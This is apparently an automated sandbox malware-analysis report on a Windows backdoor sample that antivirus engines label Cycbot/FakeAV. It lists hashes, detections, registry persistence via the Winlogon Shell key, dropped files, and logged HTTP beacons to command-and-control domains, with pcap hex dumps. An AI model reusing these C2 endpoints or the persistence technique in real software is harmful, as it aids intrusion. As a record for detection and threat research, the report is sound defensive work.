Analysis Date2015-01-17 01:42:18
MD52e43e403e87f563a6c2b7faf5706753f
SHA1bae3578b4c81fc6c8fe99c269a4aa017749554d5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 4d45b2e0b623bd8723d5f6a649c43e33 sha1: f4d31f4896e695d264f7d2ed1dd5c7f09ee5c604 size: 99328
Section.rdata md5: 22d032028f7b99c6f89ec1f772c44f26 sha1: d7d29dc447101e1d73f401a8ecdb802507711871 size: 2048
Section.data md5: 5d450662492b17d527df8584663a579f sha1: 27da32bb1308244ad6d997687e17fb9d90b99377 size: 80896
Section.reloc md5: ca1c4585c604c1723034ef5712a17a73 sha1: 6aa45d4818b7bbfb33f799c4d97753e79af325ba size: 1024
Timestamp2005-09-25 12:30:25
PEhash70d67038568d98578e71d85a90ca3a594b773a69
IMPhash2ad5b6992a5dcf3b9c3d6c9cf36dc11f
AV360 Safeno_virus
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.5
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/FraudSecurity.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVno_virus
AVDr. WebTrojan.DownLoader5.478
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.TJJ
AVFortinetW32/FakeAV.ISS!tr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.s
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSresetmymemory.com
Winsock DNSworldmotoblo.com
Winsock DNS127.0.0.1
Winsock DNScrazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNScrazyleafdesign.com
Type: A
199.201.88.112
DNSzonedg.com
Type: A
141.8.225.80
DNSresetmymemory.com
Type: A
192.155.89.148
DNSworldmotoblo.com
Type: A
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqJSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP GEThttp://resetmymemory.com/blog/images/3521.jpg?v34=92&tq=gKZEtzyMv5rJqxG1J42pzMffBfQo1%2BjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaS%2FT%2Bsqti8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 199.201.88.112:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 192.155.89.148:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1041 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 79765571 25324633   OQij%2B8yvUq%2F3
0x000000c0 (00192)   766c6557 626b5925 33442048 5454502f   vleWbkY%3D HTTP/
0x000000d0 (00208)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000e0 (00224)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x000000f0 (00240)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000100 (00256)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000110 (00272)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000120 (00288)   6c6f7365 0d0a0d0a 6e656374 696f6e3a   lose....nection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 32755976 45615376   OQij%2B82uYvEaSv
0x000000c0 (00192)   54253242 73714a53 72253246 65253242   T%2BsqJSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615376   OQij%2B8yjYvEaSv
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615350   OQij%2B8yjYvEaSP
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73716c53 72253246 65253242   T%2BsqlSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7633 343d3932   /3521.jpg?v34=92
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 4266516f   qxG1J42pzMffBfQo
0x00000040 (00064)   31253242 6a627776 67533931 37583635   1%2BjbwvgS917X65
0x00000050 (00080)   724a716c 4c666750 69575731 63672048   rJqlLfgPiWW1cg H
0x00000060 (00096)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x00000070 (00112)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000080 (00128)   3a207265 7365746d 796d656d 6f72792e   : resetmymemory.
0x00000090 (00144)   636f6d0d 0a416363 6570743a 202a2f2a   com..Accept: */*
0x000000a0 (00160)   0d0a5573 65722d41 67656e74 3a206d6f   ..User-Agent: mo
0x000000b0 (00176)   7a696c6c 612f322e 300d0a0d 0a210a20   zilla/2.0....!. 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 0d0a                </html>...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 79765571 25324633   OQij%2B8yvUq%2F3
0x000000c0 (00192)   766c6557 626b5925 33442048 5454502f   vleWbkY%3D HTTP/
0x000000d0 (00208)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000e0 (00224)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x000000f0 (00240)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000100 (00256)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000110 (00272)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000120 (00288)   6c6f7365 0d0a0d0a 3c2f626f 64793e0a   lose....</body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 0d0a                </html>...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 32755976 45615350   OQij%2B82uYvEaSP
0x000000c0 (00192)   54253242 73716c53 72253246 65253242   T%2BsqlSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 43695976 45615325   OQij%2B8CiYvEaS%
0x000000c0 (00192)   32465425 32427371 74693852 704c3666   2FT%2Bsqti8RpL6f
0x000000d0 (00208)   68537225 32466525 32425635 5a755267   hSr%2Fe%2BV5ZuRg
0x000000e0 (00224)   25334425 33442048 5454502f 312e310d   %3D%3D HTTP/1.1.
0x000000f0 (00240)   0a486f73 743a207a 6f6e6564 672e636f   .Host: zonedg.co
0x00000100 (00256)   6d0d0a55 7365722d 4167656e 743a206d   m..User-Agent: m
0x00000110 (00272)   6f7a696c 6c612f32 2e300d0a 436f6e74   ozilla/2.0..Cont
0x00000120 (00288)   656e742d 4c656e67 74683a20 300d0a43   ent-Length: 0..C
0x00000130 (00304)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000140 (00320)   0d0a0d0a 72206469 72656374 6f72792e   ....r directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   a001                                  ..


Strings
j

080904b0
1.0.0.1
2023
&Execute    Shift+E
FileVersion
PrivateBuild
ProductVersion
&shit menu
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
```````
`````````````>>>>###
````//
~~~~~~~~
~~~~~~~~~
~~~~~~~~~~~
<<<<<<<
>>>>>>>>>>
>>>>>>>>>>>>
||||||||||||
       
 *@@|&
________
,` ,`@
:::::::::::
:::::::::::::::
!!!%%%%%%%%
//////
//////////|||||||
"""""""
(].?|[
))))))
}}}}}|||
@@@@@@@
$$$$$$$$
$$$$$$$$$$$
&&&&&&&&&&&&
#########
++++++++++++++++
0000000
00000bb
0AO)  
0fB7z}
;0v@/\
"0XUu|
1>>>>>
10c=z(
[1#qm}
|1%X&@
~~~~~22
==============22
2222222222
2A	9Roo
33333333
33tttttKKKKK
&*#39R
3mbB"+Y@E_
&@`3Z0
^4a&  m
4~Gpz3
4p/<j	
4~/?-U
50:d,`
555555=
		555''zz
